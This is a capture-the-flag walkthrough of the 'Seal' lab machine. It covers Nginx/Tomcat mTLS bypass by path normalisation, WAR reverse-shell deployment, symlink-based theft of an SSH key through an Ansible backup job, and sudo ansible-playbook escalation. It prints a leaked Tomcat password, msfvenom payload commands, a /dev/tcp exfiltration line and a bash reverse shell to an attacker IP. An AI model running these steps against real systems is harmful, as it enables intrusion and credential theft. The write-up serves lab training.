PRIMARY CATEGORY → MEDIUM

Summary

  • Domain/Subdomain Extraction from a TLS Certificate’s Common Name Section using OpenSSL
  • Web Content Fuzzing (Gobuster)
  • GitBucket Repository Inspection
  • Information Leakage/Disclosure on GitBucket via Git Logs
  • Nginx Virtual Host Configuration File Inspection
  • Understanding mTLS and its implementation in Nginx
  • Nginx mTLS Bypass leveraging the differences in Normalization and URL parsing between Nginx and Tomcat
  • RCE in Tomcat’s Manager via .WAR file deployment leveraging Nginx mTLS Bypass
  • Local PE through an Arbitrary File Read via an Ansible Playbook Cron Job leveraging Symlinks
  • Monitoring of system processes using PSpy
  • Several methods of connecting via SSH using Key Authentication
  • Local PE via Sudo Privileges (Ansible-Playbook)


Setup

Directory creation with the Machine’s Name

mkdir Seal && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

mkt

Recon

OS Identification

First, proceed to identify the Target Operating System. This can be done with a simple ping, taking into account the TTL value of the reply

The standard values are →

  • About 64 → Linux
  • About 128 → Windows
ping -c1 10.129.95.190

As mentioned, according to the TTL, it seems to be a Linux Target
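
The rule of thumb above can be wrapped in a tiny helper (a sketch; the 64/128 defaults are the usual ones, though keep in mind that each hop in transit decrements the TTL):

```shell
# guess_os_from_ttl: map an observed TTL to a likely OS, assuming the
# common defaults (Linux ~64, Windows ~128); hops in transit lower the value
guess_os_from_ttl() {
  local ttl=$1
  if [ "$ttl" -le 64 ]; then
    echo "Linux"
  else
    echo "Windows"
  fi
}

# Usage: parse the TTL out of a single ping reply
# ttl=$(ping -c1 10.129.95.190 | grep -oP 'ttl=\K[0-9]+')
# guess_os_from_ttl "$ttl"
```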

Port Scanning
General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.95.190

Open Ports → 22, 443 and 8080

Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

extractPorts allPorts

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

nmap -p22,443,8080 -sCV -n -Pn --disable-arp-ping -oN targeted 10.129.95.190
OS Version (Codename)

In Linux Systems, the Operating System Version can often be inferred from package versions through Launchpad

According to the Version Column Data of the Comprehensive Scan, proceed as follows →

  • 22 - SSH

Reference

OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 site:launchpad.net
  • 443 - HTTPS

Reference

nginx 1.18.0 site:launchpad.net

Codename → Ubuntu Focal

This can be verified once the shell is obtained, i.e. the system has been compromised

There are several ways to carry this out →

cat /etc/os-release
hostnamectl # If System has been booted via Systemd
lsb_release -a
cat /etc/issue
cat /proc/version
22 - SSH

OpenSSH Version → 8.2

The Version of the Service running can also be obtained via Banner Grabbing as follows →

nc -v 10.129.95.190 22 <<< ""

In this case, nothing interesting is extracted

443 - HTTPS
Web Technologies

We start gathering the Web Technologies running behind the Website to know exactly what we are facing this time

We can carry out this task by using tools such as whatweb or curl

curl --silent --request GET --location --insecure --head 'https://10.129.95.190'

There is an Nginx running on the remote machine, perhaps as a reverse proxy, in which case there should be an Upstream Web Server behind it, such as Apache or Tomcat

If that is the case, we should be aware that the way the two web servers interpret and normalise routes may differ

whatweb https://10.129.95.190

And we have a domain disclosed through an email address

We could extract another domain or subdomain by inspecting the Common Name section of the TLS Certificate issued for target’s website

We could achieve this using openssl s_client and openssl x509 as follows

openssl x509 -noout -subject < <( openssl s_client -connect 10.129.95.190:443 2> /dev/null 0>&2 )

Nothing new here…

However, it is possible that the Web Server has configured a Virtual Host related to this domain

Therefore, we will add this domain to the /etc/hosts file

printf "10.129.95.190\tseal.htb\n" >> /etc/hosts

We can check if the output of whatweb is the same as for the IP Address

whatweb https://seal.htb

And it seems that it does

Another way to validate this is by comparing the total number of characters in the HTTP Responses

To do this, proceed as follows →

curl --silent --location --request GET --insecure 'https://10.129.95.190' | wc -c
curl --silent --location --request GET --insecure 'https://seal.htb' | wc -c

And the output is the same; thus, the same content is delivered for both the IP Address and the domain
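
The manual comparison above can be folded into a small helper (`same_size` is a hypothetical name, not a standard tool; it assumes both curl requests succeed):

```shell
# same_size: hypothetical helper comparing the response body sizes of two
# URLs, as done manually above; prints "same" or "different"
same_size() {
  local a b
  a=$(curl --silent --location --insecure "$1" | wc -c)
  b=$(curl --silent --location --insecure "$2" | wc -c)
  if [ "$a" -eq "$b" ]; then echo "same"; else echo "different"; fi
}

# Usage:
# same_size 'https://10.129.95.190' 'https://seal.htb'
```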

Browser-based Inspection

If we access this URL from the browser → https://10.129.95.190, the following content is delivered and rendered

The wappalyzer addon reports these Web Technologies

Nothing new compared to whatweb

We could check which is the Server-Side Programming Language by requesting resources such as an index.php

We got a 404 Error but we now know that the upstream web server is an Apache Tomcat

When facing a Tomcat, the first thing we should probably do is try to access Tomcat’s manager

The URL is usually http[s]://domain.tld/manager/html

But, if we try to access the above resource, we get a 403 Forbidden Error from Nginx

We could fuzz the existent web resources on this website

This way we can validate if there are more resources where we get a 403 Forbidden Error

We use gobuster for this task

gobuster dir --no-tls-validation --add-slash --threads 200 --output webScan.gobuster --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://10.129.95.190

And the other resources do not give a 403 error, but we do not know for sure because they return a redirection

Thus, we can make an HTTP Request to one of the above URLs following the redirection and see what the status code is

curl --silent --request GET --location --insecure --head 'https://10.129.95.190/admin'

And we get the same. It’s a bit odd, to be honest

However, we can continue fuzzing the admin directory as it looks interesting

gobuster dir --no-tls-validation --extensions html --threads 150 --output adminScan.gobuster --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://10.129.95.190/admin/

And there is a dashboard.html file, which gives a 403 Forbidden Error

So, there might be several location directives in the Virtual Host file which contain some sort of validation

  • location /manager/html

  • location /admin/dashboard

Or something like that

It looks like this validation returns a 403 Error if a certain condition is not met

The Home page is a static one, i.e. there is no URL which redirects to different content

All the URLs redirect to another section of the same page

The only interesting features are the following ones →

  • A search bar

  • A Contact Form

Neither of them does anything

The only interesting things so far are the /manager/html and the /admin/dashboard

But both of them give a 403 Error

Therefore, let’s continue with the next HTTP Port

8080 - HTTP
Web Technologies

As we did before, let’s use whatweb and curl

curl --silent --request GET --location --head 'http://10.129.95.190:8080'
HTTP/1.1 401 Unauthorized

Nothing interesting apart from the 401 Unauthorized Error

whatweb http://10.129.95.190:8080

The same…

Information Leakage on GitBucket through git logs

If we take a look at the website from the browser, we see that it is running GitBucket as the Web Application

There is a login form and we can do nothing until we log into the application

Since we do not have a valid account, we will create a new one with the following data

Once logged in, we can browse the repositories section. And we have the following →

Two repositories and some activity related to both of them by certain users → Luis and Alex

Inspecting both repositories, the so-called Infra does not contain much

However, there are a bunch of interesting things in the commits section of the seal_market repository

If we browse the repository files corresponding to the commit made by Luis, whose comment is Updating tomcat configuration, we can see the content of the tomcat-users.xml file inside the tomcat directory

Note that this file usually contains some type of credentials related to the /manager/html panel or something similar

In this case we have the credentials of the user tomcat who has manager-gui and admin-gui roles

User Tomcat
Password 42MrHBf*z8{Z%

Although, remember that we cannot access /manager/html due to the 403 Forbidden Error, so we cannot verify the above credentials yet

If we keep inspecting the commits section and the corresponding files on those timelines, we come across the nginx default configuration file in the Updating nginx configuration commit

We now know exactly what is happening

Let’s start from the beginning

server {
	...
	root /var/www/html;
	ssl_protocols TLSv1.1 TLSv1.2;
	ssl_verify_client optional;
	...
}

We see the ssl_verify_client directive, which enables the mTLS (Mutual TLS)

Notice that, in a TLS Connection, the server presents its TLS Certificate to the client, and the client validates it by checking that everything is correct

But, in mTLS, both parties validate each other’s certificates. Therefore, the client must also present its TLS Certificate to the server

The certificate presented by the client must be issued by the same CA that issued the Server Certificate

In this case, the value of this directive is optional instead of on. This allows validation to be handled in other configuration blocks, such as the location blocks

If the value of the directive were on, any client presenting an invalid certificate would be rejected by Nginx with a 400 Bad Request

location /manager/html {
	if ($ssl_client_verify != SUCCESS) {
		return 403;
	}
	...
}
 
location /admin/dashboard {
	if ($ssl_client_verify != SUCCESS) {
		return 403;
	}
	...
}
 
location /host-manager/html {
	if ($ssl_client_verify != SUCCESS) {
		return 403;
	}
	...
}

Since the ssl_verify_client directive’s value is optional, if verification of the client’s certificate fails, the Web Server will not respond directly with a 400 Bad Request; instead, the validation is handled in the corresponding location block, depending on the path of the requested resource

Then, if the verification fails, nginx will respond with a 403 Forbidden

That’s why we get a 403 Forbidden when trying to access resources such as /manager/html or /admin/dashboard, because we enter the corresponding location block

location / {
	proxy_set_header        Host $host;
	proxy_set_header        X-Real-IP $remote_addr;
	proxy_pass          http://localhost:8000;
	...
}	

Any requested resource, whose URI does not match the three location blocks above, will be dropped to the location / block and passed directly to the backend web server, in this case Tomcat, via the proxy_pass directive

This is where the concept set out above comes into play

We said that, in a web server architecture where an nginx runs as a reverse proxy, receiving all requests, and a backend web server, such as Apache or Tomcat, handles the dynamic content, the way the two servers handle and normalise URLs may differ

Applied to /manager/html, we know that if we request this resource, that request will fall in the location /manager/html block and we will receive a 403 Forbidden as the mTLS validation will also fail

We can address this situation in two ways →

Assuming that the CA that issued the server certificate is installed on the same machine (Bad Practice!! 😅), if an LFI vulnerability is disclosed in any Web Server Application, an attacker could try to point to the path of the CA’s private key, extract its content and create, on their side, a valid client certificate that will be presented to the Web Server to pass mTLS validation
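
The first approach would look roughly like this with openssl (a sketch; the demo CA generated in the first command stands in for the stolen one — on a real engagement ca.key/ca.crt would come from the LFI):

```shell
# Demo only: create a stand-in CA (on the target, this key would be the stolen one)
openssl req -x509 -newkey rsa:2048 -nodes -subj '/CN=demo-ca' \
        -keyout ca.key -out ca.crt -days 1

# Generate a client key + CSR and sign the CSR with the CA
openssl req -new -newkey rsa:2048 -nodes -subj '/CN=attacker' \
        -keyout client.key -out client.csr
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key \
        -CAcreateserial -out client.crt -days 1

# Present the client certificate to pass the mTLS check:
# curl --insecure --cert client.crt --key client.key 'https://10.129.95.190/manager/html'
```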

Or, in this case, we could investigate whether nginx and tomcat differ in URL normalisation. We could then request a resource that contains /manager/html but does not match the path specified in the location /manager/html block, so the request will fall into location / and be passed to Tomcat, which may interpret the requested URL as /manager/html

A quick Google Search gives us these resources

Reference I    •    Reference II    •    Reference III


Exploitation

Nginx mTLS Bypass (Path Normalization) leads to RCE in Tomcat’s Manager via .WAR file deployment

So, according to the above resources and the following image →

Since nginx and tomcat parse URLs differently, we can manipulate the requested path by adding characters such as ..; or a path parameter like /;name=orange/ so that it no longer matches the /manager/html location block

https://domain.tld/manager;param=value/html

As mentioned, the /manager;param=value/html path will not match the /manager/html location block defined in nginx, so this request will fall into the / location block, passing it to tomcat

Tomcat will then parse the requested path as /manager/html, bypassing the mTLS validation by avoiding entering the location blocks containing the validation
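
The trick can be expressed as a small helper (`bypass_url` is a hypothetical name introduced here for illustration):

```shell
# bypass_url: inject a path parameter into the first segment of a protected
# path, so nginx's prefix location match fails while Tomcat strips the
# ";param=value" part during its own normalisation
bypass_url() {
  local host=$1 path=$2
  echo "https://${host}$(echo "$path" | sed 's|^/\([^/]*\)/|/\1;param=value/|')"
}

# Usage:
# bypass_url 10.129.95.190 /manager/html
# → https://10.129.95.190/manager;param=value/html
```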

Therefore, we request the following url →

https://10.129.95.190/manager;param=value/html

And we are asked for credentials to access the tomcat manager interface

Once we’re in, we have several ways to get Remote Code Execution and access the remote machine by establishing a reverse connection

Reference

We can upload a WAR file containing a .JSP file which makes a reverse connection to the specified socket (IP Address:Port) inside it once the WAR file is deployed

Or the .JSP file could be a web shell

Thus, proceed as follows →

From the Attacker
  • Create a WAR Payload using MSFVenom
msfvenom --payload java/jsp_shell_reverse_tcp LHOST=10.10.16.37 LPORT=443 --platform linux --arch x64 --format war --out rev.war
  • Set up a Listening Socket using the port specified in the above command
netcat -nlvp 443
  • Upload the WAR Payload 😊

A new tomcat application called /rev should have been created

  • Make a request to the application path and Receive the reverse connection
curl --silent --location --request GET --insecure --output /dev/null 'https://10.129.95.190/rev/'

Shell as Web User

Once a connection via Reverse Shell is established, just proceed as follows to upgrade the obtained shell to a Fully Interactive TTY

Reference

Script
script /dev/null -c bash
<C-z>
stty raw -echo ; fg
reset xterm
export TERM=xterm-256color
export SHELL=/bin/bash
. /etc/skel/.bashrc
stty rows 61 columns 248

Privesc #1

Initial Non-Privileged User → Tomcat

Once we are inside, first of all, check all the system groups the current user belongs to

id

There is nothing interesting

Next, we check if the current user has any sudoers privileges assigned

sudo -l

And we get the following message. It’s a bit odd, to be honest

We can list the available directories in the /home directory

ls -l /home

And we have the luis user’s home directory. We extract the files readable by the current user

find /home/luis \( -path '*.gitbucket*' -o -path '*.cache*' \) -prune -o -type f -readable -ls 2> /dev/null

We could search for some juicy information within the .bashrc file, such as aliases, or check for leaked credentials in the config file inside the jgit directory

But there is nothing interesting in these files

Looking for any software installed on the remote machine under the /opt directory, we find the following content

find /opt -readable 2> /dev/null

The /opt/backups/playbook directory seems interesting

It contains an ansible playbook with the following content →

This ansible playbook has three different defined tasks

  • Copy Files → Uses the Synchronize module to copy the content from a certain system location to another

  • Server Backups → Compresses the specified directory or archive by leveraging the Archive module

  • Clean → Removes a specific directory using the absent state of the File module

However, there is one thing about the Copy Files task that stands out: it uses the ansible synchronize module to perform the copy operation

But the copy_links option is set to yes, which means that it copies the actual file that a symlink points to instead of copying the symlink itself

This makes it vulnerable to a local privesc if there is a cron job run by another user invoking the ansible-playbook binary with this playbook as an argument, or if the current user has a sudoers privilege allowing him to run it as another user

synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes

The source of the sync task is /var/lib/tomcat9/webapps/ROOT/admin/dashboard

If we had write permissions on this directory, we could create a symbolic link pointing to a sensitive file

If another user runs this ansible playbook, we might be able to read arbitrary files belonging to that user

Since the copy_links parameter is enabled, we can create a symlink inside the writable folder pointing to a sensitive file owned by the effective user; the sync task will then copy the actual file pointed to by the symlink instead of the symlink itself, as explained above

ls -l /var/lib/tomcat9/webapps/ROOT/admin/dashboard | grep -i -- uploads

And the uploads directory is world-writable, so we can create any file within it

We have already checked that the current user does not have any sudoers privilege

We can now list the processes that run at regular time intervals to check if a certain user, such as luis, runs this ansible-playbook

To achieve this task, just transfer a pspy binary to the remote machine

From the Attacker
  • Download the pspy binary
curl --silent --location --request GET 'https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64' --output pspy64
  • Build a Simple HTTP Server
python3 -m http.server 80
From the Target
  • Transfer the pspy binary and execute it
wget 'http://10.10.16.37/pspy64' -O /dev/shm/pspy
chmod 777 !$
!$

And if we wait a little bit, we get the following results →

sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml

And we see that root is executing the above commands as user luis

That command runs the analyzed ansible playbook

Therefore, since we have write permissions on the uploads directory, as mentioned, we could create a symlink pointing to a sensitive file owned by luis

This file could be, if it exists, /home/luis/.ssh/id_rsa

Thus, we could connect to the remote machine via SSH as luis

Note that the destination path of the sync task is /opt/backups/files

If we list the content of the /opt/backups directory, there is no files directory

Remember that all tasks defined in the ansible playbook are executed sequentially, one after another

So, after the sync task is executed, the archive task compresses the content of the /opt/backups/files directory and stores the generated compressed file in the /opt/backups/archives directory

Subsequently, the clean task deletes the /opt/backups/files directory, which means that we have to grab the compressed file from the /opt/backups/archives directory

Therefore, proceed as follows →

From the Target
  • Create a symlink in /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads pointing to /home/luis/.ssh/id_rsa
ln --symbolic /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis_rsa
  • Send the compressed file stored in /opt/backups/archives to the attacker
cat backup-2025-04-10-15:47:32.gz > /dev/tcp/10.10.16.37/443

First, we have to set a listening socket on the attacker using the specified port (443)

From the Attacker
  • Set a listening socket and redirect all incoming traffic to a file
nc -nlvp 443 > backup.gz
  • Gunzip the received file and check if the file pointed to by the created symlink exists
gunzip backup.gz
tar --list --file backup | grep -i -- 'luis'
  • Extract the above file from the tar file and check the content of the dashboard/uploads/luis_rsa file
tar -xvf backup dashboard/uploads/luis_rsa
cat ./dashboard/uploads/luis_rsa

And it looks like we have luis’ private key

Let’s try to connect to the remote machine via SSH using this key

We can proceed in two ways

#1

Specifying directly the path of the private key through the -i option

ssh -p22 -i ./dashboard/uploads/luis_rsa luis@seal.htb
#2

Uploading the private key in memory

eval "$( ssh-agent )"
ssh-add ./dashboard/uploads/luis_rsa
ssh-add -l
ssh -p22 luis@seal.htb

And we are in as luis! Grab the user.txt flag and continue 😊

cat ~/user.txt

Privesc #2 (If exists)

Non-Privileged User → Luis

Sudo Privileges (Ansible-Playbook)

As we did before, first check which groups the current user belongs to

id

But the user does not belong to any interesting group

Next, we check the sudoers privileges assigned to luis

sudo -l

And we see that the user luis can run the binary /usr/bin/ansible-playbook as any user of the system without providing a password, passing any playbook as an argument

From the Attacker

So, we could create an ansible playbook containing a task which runs a system command like bash -c 'bash -i &> /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1'
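
A minimal shell.yml could look like this (a sketch; it targets ansible’s implicit localhost with a local connection, since the command only needs to run on the box itself, and reuses the attacker socket from the listener below):

```yaml
# shell.yml — minimal sketch; replace the IP/port with your listener
- hosts: localhost
  connection: local
  tasks:
    - name: spawn a reverse shell
      shell: bash -c 'bash -i &> /dev/tcp/10.10.16.37/443 0>&1'
```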

Build another Simple HTTP Server with python to share the above resource

python3 -m http.server 80

And set up a listening socket using the TCP port specified in the created ansible playbook system command

nc -nlvp 443
From the Target

Download the created ansible playbook

curl --silent --request GET --location --output /dev/shm/shell.yml 'http://10.10.16.37/shell.yml'

Execute the ansible-playbook binary as follows

sudo -u root /usr/bin/ansible-playbook /dev/shm/shell.yml

And we are in as Root! 😈

So, just grab the content of the root.txt flag and move on to the next machine! 😊

cat ~/root.txt